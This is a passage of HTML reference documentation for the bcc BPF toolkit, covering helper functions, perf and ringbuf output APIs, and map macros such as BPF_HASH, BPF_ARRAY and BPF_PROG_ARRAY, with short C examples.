<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_pid_tgid+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_pid_tgid+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="5-bpf_get_current_uid_gid"><a class="header" href="#5-bpf_get_current_uid_gid">5. bpf_get_current_uid_gid()</a></h3>
|
||
<p>Syntax: <code>u64 bpf_get_current_uid_gid(void)</code></p>
|
||
<p>Return: <code>current_gid << 32 | current_uid</code></p>
|
||
<p>Returns the user ID in the lower 32 bits and the group ID in the upper 32 bits.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_uid_gid+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_uid_gid+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="6-bpf_get_current_comm"><a class="header" href="#6-bpf_get_current_comm">6. bpf_get_current_comm()</a></h3>
|
||
<p>Syntax: <code>bpf_get_current_comm(char *buf, int size_of_buf)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>Populates the first argument address with the current process name. It should be a pointer to a char array of at least size TASK_COMM_LEN, which is defined in linux/sched.h. For example:</p>
|
||
<pre><code class="language-C">#include &lt;linux/sched.h&gt;
|
||
|
||
int do_trace(struct pt_regs *ctx) {
|
||
char comm[TASK_COMM_LEN];
|
||
bpf_get_current_comm(&comm, sizeof(comm));
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_comm+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_comm+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="7-bpf_get_current_task"><a class="header" href="#7-bpf_get_current_task">7. bpf_get_current_task()</a></h3>
|
||
<p>Syntax: <code>bpf_get_current_task()</code></p>
|
||
<p>Return: current task as a pointer to struct task_struct.</p>
|
||
<p>Returns a pointer to the current task's task_struct object. This helper can be used to compute the on-CPU time for a process, identify kernel threads, get the current CPU's run queue, or retrieve many other pieces of information.</p>
|
||
<p>With Linux 4.13, due to issues with field randomization, you may need two #define directives before the includes:</p>
|
||
<pre><code class="language-C">#define randomized_struct_fields_start struct {
|
||
#define randomized_struct_fields_end };
|
||
#include &lt;linux/sched.h&gt;
|
||
|
||
int do_trace(void *ctx) {
|
||
struct task_struct *t = (struct task_struct *)bpf_get_current_task();
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_task+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_task+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="8-bpf_log2l"><a class="header" href="#8-bpf_log2l">8. bpf_log2l()</a></h3>
|
||
<p>Syntax: <code>unsigned int bpf_log2l(unsigned long v)</code></p>
|
||
<p>Returns the log-2 of the provided value. This is often used to create indexes for histograms, to construct power-of-2 histograms.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_log2l+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_log2l+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="9-bpf_get_prandom_u32"><a class="header" href="#9-bpf_get_prandom_u32">9. bpf_get_prandom_u32()</a></h3>
|
||
<p>Syntax: <code>u32 bpf_get_prandom_u32()</code></p>
|
||
<p>Returns a pseudo-random u32.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_prandom_u32+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_prandom_u32+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="10-bpf_probe_read_user"><a class="header" href="#10-bpf_probe_read_user">10. bpf_probe_read_user()</a></h3>
|
||
<p>Syntax: <code>int bpf_probe_read_user(void *dst, int size, const void *src)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>This attempts to safely read size bytes from user address space to the BPF stack, so that BPF can later operate on it. For safety, all user address space memory reads must pass through bpf_probe_read_user().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_user+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_user+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="11-bpf_probe_read_user_str"><a class="header" href="#11-bpf_probe_read_user_str">11. bpf_probe_read_user_str()</a></h3>
|
||
<p>Syntax: <code>int bpf_probe_read_user_str(void *dst, int size, const void *src)</code></p>
|
||
<p>Return:</p>
|
||
<ul>
|
||
<li>> 0 length of the string including the trailing NULL on success</li>
|
||
<li>< 0 error</li>
|
||
</ul>
|
||
<p>This copies a <code>NULL</code> terminated string from user address space to the BPF stack, so that BPF can later operate on it. In case the string length is smaller than size, the target is not padded with further <code>NULL</code> bytes. In case the string length is larger than size, just <code>size - 1</code> bytes are copied and the last byte is set to <code>NULL</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_user_str+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_user_str+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="12-bpf_get_ns_current_pid_tgid"><a class="header" href="#12-bpf_get_ns_current_pid_tgid">12. bpf_get_ns_current_pid_tgid()</a></h3>
|
||
<p>Syntax: <code>u32 bpf_get_ns_current_pid_tgid(u64 dev, u64 ino, struct bpf_pidns_info* nsdata, u32 size)</code></p>
|
||
<p>Values for <em>pid</em> and <em>tgid</em> as seen from the current <em>namespace</em> will be returned in <em>nsdata</em>.</p>
|
||
<p>Return 0 on success, or one of the following in case of failure:</p>
|
||
<ul>
|
||
<li>
|
||
<p><strong>-EINVAL</strong> if dev and inum supplied don't match dev_t and inode number with nsfs of current task, or if dev conversion to dev_t lost high bits.</p>
|
||
</li>
|
||
<li>
|
||
<p><strong>-ENOENT</strong> if pidns does not exist for the current task.</p>
|
||
</li>
|
||
</ul>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_ns_current_pid_tgid+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_ns_current_pid_tgid+path%3Atools&type=Code">search /tools</a></p>
|
||
<h2 id="debugging"><a class="header" href="#debugging">Debugging</a></h2>
|
||
<h3 id="1-bpf_override_return"><a class="header" href="#1-bpf_override_return">1. bpf_override_return()</a></h3>
|
||
<p>Syntax: <code>int bpf_override_return(struct pt_regs *, unsigned long rc)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>When used in a program attached to a function entry kprobe, causes the
|
||
execution of the function to be skipped, immediately returning <code>rc</code> instead.
|
||
This is used for targeted error injection.</p>
|
||
<p>bpf_override_return will only work when the kprobed function is whitelisted to
|
||
allow error injections. Whitelisting entails tagging a function with
|
||
<code>ALLOW_ERROR_INJECTION()</code> in the kernel source tree; see <code>io_ctl_init</code> for
|
||
an example. If the kprobed function is not whitelisted, the bpf program will
|
||
fail to attach with <code>ioctl(PERF_EVENT_IOC_SET_BPF): Invalid argument</code>.</p>
|
||
<pre><code class="language-C">int kprobe__io_ctl_init(void *ctx) {
|
||
bpf_override_return(ctx, -ENOMEM);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<h2 id="output"><a class="header" href="#output">Output</a></h2>
|
||
<h3 id="1-bpf_trace_printk"><a class="header" href="#1-bpf_trace_printk">1. bpf_trace_printk()</a></h3>
|
||
<p>Syntax: <code>int bpf_trace_printk(const char *fmt, ...)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>A simple kernel facility for printf() to the common trace_pipe (/sys/kernel/debug/tracing/trace_pipe). This is ok for some quick examples, but has limitations: 3 args max, 1 %s only, and trace_pipe is globally shared, so concurrent programs will have clashing output. A better interface is via BPF_PERF_OUTPUT(). Note that calling this helper is made simpler than the original kernel version, which has <code>fmt_size</code> as the second parameter.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_trace_printk+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_trace_printk+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="2-bpf_perf_output"><a class="header" href="#2-bpf_perf_output">2. BPF_PERF_OUTPUT</a></h3>
|
||
<p>Syntax: <code>BPF_PERF_OUTPUT(name)</code></p>
|
||
<p>Creates a BPF table for pushing out custom event data to user space via a perf ring buffer. This is the preferred method for pushing per-event data to user space.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
BPF_PERF_OUTPUT(events);
|
||
|
||
int hello(struct pt_regs *ctx) {
|
||
struct data_t data = {};
|
||
|
||
data.pid = bpf_get_current_pid_tgid();
|
||
data.ts = bpf_ktime_get_ns();
|
||
bpf_get_current_comm(&data.comm, sizeof(data.comm));
|
||
|
||
events.perf_submit(ctx, &data, sizeof(data));
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>The output table is named <code>events</code>, and data is pushed to it via <code>events.perf_submit()</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERF_OUTPUT+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERF_OUTPUT+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="3-perf_submit"><a class="header" href="#3-perf_submit">3. perf_submit()</a></h3>
|
||
<p>Syntax: <code>int perf_submit((void *)ctx, (void *)data, u32 data_size)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>A method of a BPF_PERF_OUTPUT table, for submitting custom event data to user space. See the BPF_PERF_OUTPUT entry. (This ultimately calls bpf_perf_event_output().)</p>
|
||
<p>The <code>ctx</code> parameter is provided in <a href="bcc-documents/reference_guide.html#1-kprobes">kprobes</a> or <a href="bcc-documents/reference_guide.html#2-kretprobes">kretprobes</a>. For <code>SCHED_CLS</code> or <code>SOCKET_FILTER</code> programs, the <code>struct __sk_buff *skb</code> must be used instead.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_submit+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_submit+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="4-perf_submit_skb"><a class="header" href="#4-perf_submit_skb">4. perf_submit_skb()</a></h3>
|
||
<p>Syntax: <code>int perf_submit_skb((void *)ctx, u32 packet_size, (void *)data, u32 data_size)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>A method of a BPF_PERF_OUTPUT table available in networking program types, for submitting custom event data to user space, along with the first <code>packet_size</code> bytes of the packet buffer. See the BPF_PERF_OUTPUT entry. (This ultimately calls bpf_perf_event_output().)</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_submit_skb+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_submit_skb+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="5-bpf_ringbuf_output"><a class="header" href="#5-bpf_ringbuf_output">5. BPF_RINGBUF_OUTPUT</a></h3>
|
||
<p>Syntax: <code>BPF_RINGBUF_OUTPUT(name, page_cnt)</code></p>
|
||
<p>Creates a BPF table for pushing out custom event data to user space via a ringbuf ring buffer.
|
||
<code>BPF_RINGBUF_OUTPUT</code> has several advantages over <code>BPF_PERF_OUTPUT</code>, summarized as follows:</p>
|
||
<ul>
|
||
<li>Buffer is shared across all CPUs, meaning no per-CPU allocation</li>
|
||
<li>Supports two APIs for BPF programs
|
||
<ul>
|
||
<li><code>map.ringbuf_output()</code> works like <code>map.perf_submit()</code> (covered in <a href="bcc-documents/reference_guide.html#6-ringbuf_output">ringbuf_output</a>)</li>
|
||
<li><code>map.ringbuf_reserve()</code>/<code>map.ringbuf_submit()</code>/<code>map.ringbuf_discard()</code>
|
||
split the process of reserving buffer space and submitting events into two steps
|
||
(covered in <a href="bcc-documents/reference_guide.html#7-ringbuf_reserve">ringbuf_reserve</a>, <a href="bcc-documents/reference_guide.html#8-ringbuf_submit">ringbuf_submit</a>, <a href="bcc-documents/reference_guide.html#9-ringbuf_discard">ringbuf_discard</a>)</li>
|
||
</ul>
|
||
</li>
|
||
<li>BPF APIs do not require access to a CPU ctx argument</li>
|
||
<li>Superior performance and latency in userspace thanks to a shared ring buffer manager</li>
|
||
<li>Supports two ways of consuming data in userspace</li>
|
||
</ul>
|
||
<p>Starting in Linux 5.8, this should be the preferred method for pushing per-event data to user space.</p>
|
||
<p>Example of both APIs:</p>
|
||
<pre><code class="language-C">struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
// Creates a ringbuf called events with 8 pages of space, shared across all CPUs
|
||
BPF_RINGBUF_OUTPUT(events, 8);
|
||
|
||
int first_api_example(struct pt_regs *ctx) {
|
||
struct data_t data = {};
|
||
|
||
data.pid = bpf_get_current_pid_tgid();
|
||
data.ts = bpf_ktime_get_ns();
|
||
bpf_get_current_comm(&data.comm, sizeof(data.comm));
|
||
|
||
events.ringbuf_output(&data, sizeof(data), 0 /* flags */);
|
||
|
||
return 0;
|
||
}
|
||
|
||
int second_api_example(struct pt_regs *ctx) {
|
||
struct data_t *data = events.ringbuf_reserve(sizeof(struct data_t));
|
||
if (!data) { // Failed to reserve space
|
||
return 1;
|
||
}
|
||
|
||
data->pid = bpf_get_current_pid_tgid();
|
||
data->ts = bpf_ktime_get_ns();
|
||
bpf_get_current_comm(&data->comm, sizeof(data->comm));
|
||
|
||
events.ringbuf_submit(data, 0 /* flags */);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>The output table is named <code>events</code>. Data is allocated via <code>events.ringbuf_reserve()</code> and pushed to it via <code>events.ringbuf_submit()</code>.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_RINGBUF_OUTPUT+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="6-ringbuf_output"><a class="header" href="#6-ringbuf_output">6. ringbuf_output()</a></h3>
|
||
<p>Syntax: <code>int ringbuf_output((void *)data, u64 data_size, u64 flags)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>Flags:</p>
|
||
<ul>
|
||
<li><code>BPF_RB_NO_WAKEUP</code>: Do not send notification of new data availability</li>
|
||
<li><code>BPF_RB_FORCE_WAKEUP</code>: Send notification of new data availability unconditionally</li>
|
||
</ul>
|
||
<p>A method of the BPF_RINGBUF_OUTPUT table, for submitting custom event data to user space. This method works like <code>perf_submit()</code>,
|
||
although it does not require a ctx argument.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=ringbuf_output+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="7-ringbuf_reserve"><a class="header" href="#7-ringbuf_reserve">7. ringbuf_reserve()</a></h3>
|
||
<p>Syntax: <code>void* ringbuf_reserve(u64 data_size)</code></p>
|
||
<p>Return: Pointer to data struct on success, NULL on failure</p>
|
||
<p>A method of the BPF_RINGBUF_OUTPUT table, for reserving space in the ring buffer and simultaneously
|
||
allocating a data struct for output. Must be used with one of <code>ringbuf_submit</code> or <code>ringbuf_discard</code>.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=ringbuf_reserve+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="8-ringbuf_submit"><a class="header" href="#8-ringbuf_submit">8. ringbuf_submit()</a></h3>
|
||
<p>Syntax: <code>void ringbuf_submit((void *)data, u64 flags)</code></p>
|
||
<p>Return: Nothing, always succeeds</p>
|
||
<p>Flags:</p>
|
||
<ul>
|
||
<li><code>BPF_RB_NO_WAKEUP</code>: Do not send notification of new data availability</li>
|
||
<li><code>BPF_RB_FORCE_WAKEUP</code>: Send notification of new data availability unconditionally</li>
|
||
</ul>
|
||
<p>A method of the BPF_RINGBUF_OUTPUT table, for submitting custom event data to user space. Must be preceded by a call to
|
||
<code>ringbuf_reserve()</code> to reserve space for the data.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=ringbuf_submit+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="9-ringbuf_discard"><a class="header" href="#9-ringbuf_discard">9. ringbuf_discard()</a></h3>
|
||
<p>Syntax: <code>void ringbuf_discard((void *)data, u64 flags)</code></p>
|
||
<p>Return: Nothing, always succeeds</p>
|
||
<p>Flags:</p>
|
||
<ul>
|
||
<li><code>BPF_RB_NO_WAKEUP</code>: Do not send notification of new data availability</li>
|
||
<li><code>BPF_RB_FORCE_WAKEUP</code>: Send notification of new data availability unconditionally</li>
|
||
</ul>
|
||
<p>A method of the BPF_RINGBUF_OUTPUT table, for discarding custom event data; userspace
|
||
ignores the data associated with the discarded event. Must be preceded by a call to
|
||
<code>ringbuf_reserve()</code> to reserve space for the data.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=ringbuf_discard+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h2 id="maps"><a class="header" href="#maps">Maps</a></h2>
|
||
<p>Maps are BPF data stores, and are the basis for higher level object types including tables, hashes, and histograms.</p>
|
||
<h3 id="1-bpf_table"><a class="header" href="#1-bpf_table">1. BPF_TABLE</a></h3>
|
||
<p>Syntax: <code>BPF_TABLE(_table_type, _key_type, _leaf_type, _name, _max_entries)</code></p>
|
||
<p>Creates a map named <code>_name</code>. Most of the time this will be used via higher-level macros, like BPF_HASH, BPF_ARRAY, BPF_HISTOGRAM, etc.</p>
|
||
<p><code>BPF_F_TABLE</code> is a variant that takes a flag in the last parameter. <code>BPF_TABLE(...)</code> is actually a wrapper to <code>BPF_F_TABLE(..., 0 /* flag */)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.lookup_or_try_init(), map.delete(), map.update(), map.insert(), map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_TABLE+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_TABLE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h4 id="pinned-maps"><a class="header" href="#pinned-maps">Pinned Maps</a></h4>
|
||
<p>Syntax: <code>BPF_TABLE_PINNED(_table_type, _key_type, _leaf_type, _name, _max_entries, "/sys/fs/bpf/xyz")</code></p>
|
||
<p>Create a new map if it doesn't exist and pin it to the bpffs as a FILE, otherwise use the map that was pinned to the bpffs. The type information is not enforced and the actual map type depends on the map that got pinned to the location.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_TABLE_PINNED("hash", u64, u64, ids, 1024, "/sys/fs/bpf/ids");
|
||
</code></pre>
|
||
<h3 id="2-bpf_hash"><a class="header" href="#2-bpf_hash">2. BPF_HASH</a></h3>
|
||
<p>Syntax: <code>BPF_HASH(name [, key_type [, leaf_type [, size]]])</code></p>
|
||
<p>Creates a hash map (associative array) named <code>name</code>, with optional parameters.</p>
|
||
<p>Defaults: <code>BPF_HASH(name, key_type=u64, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_HASH(start, struct request *);
|
||
</code></pre>
|
||
<p>This creates a hash named <code>start</code> where the key is a <code>struct request *</code>, and the value defaults to u64. This hash is used by the disksnoop.py example for saving timestamps for each I/O request, where the key is the pointer to struct request, and the value is the timestamp.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("hash", ...)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.lookup_or_try_init(), map.delete(), map.update(), map.insert(), map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_HASH+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_HASH+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="3-bpf_array"><a class="header" href="#3-bpf_array">3. BPF_ARRAY</a></h3>
|
||
<p>Syntax: <code>BPF_ARRAY(name [, leaf_type [, size]])</code></p>
|
||
<p>Creates an int-indexed array which is optimized for fastest lookup and update, named <code>name</code>, with optional parameters.</p>
|
||
<p>Defaults: <code>BPF_ARRAY(name, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_ARRAY(counts, u64, 32);
|
||
</code></pre>
|
||
<p>This creates an array named <code>counts</code> with 32 buckets and 64-bit integer values. This array is used by the funccount.py example for saving the call count of each function.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("array", ...)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.update(), map.increment(). Note that all array elements are pre-allocated with zero values and can not be deleted.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_ARRAY+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_ARRAY+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="4-bpf_histogram"><a class="header" href="#4-bpf_histogram">4. BPF_HISTOGRAM</a></h3>
|
||
<p>Syntax: <code>BPF_HISTOGRAM(name [, key_type [, size ]])</code></p>
|
||
<p>Creates a histogram map named <code>name</code>, with optional parameters.</p>
|
||
<p>Defaults: <code>BPF_HISTOGRAM(name, key_type=int, size=64)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_HISTOGRAM(dist);
|
||
</code></pre>
|
||
<p>This creates a histogram named <code>dist</code>, which defaults to 64 buckets indexed by keys of type int.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("histogram", ...)</code>.</p>
|
||
<p>Methods (covered later): map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_HISTOGRAM+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_HISTOGRAM+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="5-bpf_stack_trace"><a class="header" href="#5-bpf_stack_trace">5. BPF_STACK_TRACE</a></h3>
|
||
<p>Syntax: <code>BPF_STACK_TRACE(name, max_entries)</code></p>
|
||
<p>Creates a stack trace map named <code>name</code>, with a maximum entry count provided. These maps are used to store stack traces.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_STACK_TRACE(stack_traces, 1024);
|
||
</code></pre>
|
||
<p>This creates a stack trace map named <code>stack_traces</code>, with a maximum number of stack trace entries of 1024.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("stacktrace", ...)</code>.</p>
|
||
<p>Methods (covered later): map.get_stackid().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_STACK_TRACE+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_STACK_TRACE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="6-bpf_perf_array"><a class="header" href="#6-bpf_perf_array">6. BPF_PERF_ARRAY</a></h3>
|
||
<p>Syntax: <code>BPF_PERF_ARRAY(name, max_entries)</code></p>
|
||
<p>Creates a perf array named <code>name</code>, with a maximum entry count provided, which must be equal to the number of system cpus. These maps are used to fetch hardware performance counters.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">text="""
|
||
BPF_PERF_ARRAY(cpu_cycles, NUM_CPUS);
|
||
"""
|
||
b = bcc.BPF(text=text, cflags=["-DNUM_CPUS=%d" % multiprocessing.cpu_count()])
|
||
b["cpu_cycles"].open_perf_event(b["cpu_cycles"].HW_CPU_CYCLES)
|
||
</code></pre>
|
||
<p>This creates a perf array named <code>cpu_cycles</code>, with number of entries equal to the number of cpus/cores. The array is configured so that later calling map.perf_read() will return a hardware-calculated counter of the number of cycles elapsed from some point in the past. Only one type of hardware counter may be configured per table at a time.</p>
|
||
<p>Methods (covered later): map.perf_read().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERF_ARRAY+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="7-bpf_percpu_hash"><a class="header" href="#7-bpf_percpu_hash">7. BPF_PERCPU_HASH</a></h3>
|
||
<p>Syntax: <code>BPF_PERCPU_HASH(name [, key_type [, leaf_type [, size]]])</code></p>
|
||
<p>Creates NUM_CPU hash maps (associative arrays) named <code>name</code>, with optional parameters. Each CPU will have a separate copy of this hash map. The copies are not kept synchronized in any way.</p>
|
||
<p>Note that due to limits defined in the kernel (in linux/mm/percpu.c), the <code>leaf_type</code> cannot have a size of more than 32KB.
|
||
In other words, <code>BPF_PERCPU_HASH</code> elements cannot be larger than 32KB in size.</p>
|
||
<p>Defaults: <code>BPF_PERCPU_HASH(name, key_type=u64, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_PERCPU_HASH(start, struct request *);
|
||
</code></pre>
|
||
<p>This creates NUM_CPU hashes named <code>start</code> where the key is a <code>struct request *</code>, and the value defaults to u64.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("percpu_hash", ...)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.lookup_or_try_init(), map.delete(), map.update(), map.insert(), map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERCPU_HASH+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERCPU_HASH+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="8-bpf_percpu_array"><a class="header" href="#8-bpf_percpu_array">8. BPF_PERCPU_ARRAY</a></h3>
|
||
<p>Syntax: <code>BPF_PERCPU_ARRAY(name [, leaf_type [, size]])</code></p>
|
||
<p>Creates NUM_CPU int-indexed arrays which are optimized for fastest lookup and update, named <code>name</code>, with optional parameters. Each CPU will have a separate copy of this array. The copies are not kept synchronized in any way.</p>
|
||
<p>Note that due to limits defined in the kernel (in linux/mm/percpu.c), the <code>leaf_type</code> cannot have a size of more than 32KB.
|
||
In other words, <code>BPF_PERCPU_ARRAY</code> elements cannot be larger than 32KB in size.</p>
|
||
<p>Defaults: <code>BPF_PERCPU_ARRAY(name, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_PERCPU_ARRAY(counts, u64, 32);
|
||
</code></pre>
|
||
<p>This creates NUM_CPU arrays named <code>counts</code> with 32 buckets and 64-bit integer values.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("percpu_array", ...)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.update(), map.increment(). Note that all array elements are pre-allocated with zero values and can not be deleted.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERCPU_ARRAY+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERCPU_ARRAY+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="9-bpf_lpm_trie"><a class="header" href="#9-bpf_lpm_trie">9. BPF_LPM_TRIE</a></h3>
|
||
<p>Syntax: <code>BPF_LPM_TRIE(name [, key_type [, leaf_type [, size]]])</code></p>
|
||
<p>Creates a longest prefix match trie map named <code>name</code>, with optional parameters.</p>
|
||
<p>Defaults: <code>BPF_LPM_TRIE(name, key_type=u64, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-c">BPF_LPM_TRIE(trie, struct key_v6);
|
||
</code></pre>
|
||
<p>This creates an LPM trie map named <code>trie</code> where the key is a <code>struct key_v6</code>, and the value defaults to u64.</p>
|
||
<p>This is a wrapper macro to <code>BPF_F_TABLE("lpm_trie", ..., BPF_F_NO_PREALLOC)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.lookup_or_try_init(), map.delete(), map.update(), map.insert(), map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_LPM_TRIE+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_LPM_TRIE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="10-bpf_prog_array"><a class="header" href="#10-bpf_prog_array">10. BPF_PROG_ARRAY</a></h3>
|
||
<p>Syntax: <code>BPF_PROG_ARRAY(name, size)</code></p>
|
||
<p>This creates a program array named <code>name</code> with <code>size</code> entries. Each entry of the array is either a file descriptor to a bpf program or <code>NULL</code>. The array acts as a jump table so that bpf programs can "tail-call" other bpf programs.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("prog", ...)</code>.</p>
|
||
<p>Methods (covered later): map.call().</p>
|
||
<p>Examples in situ:
|
||
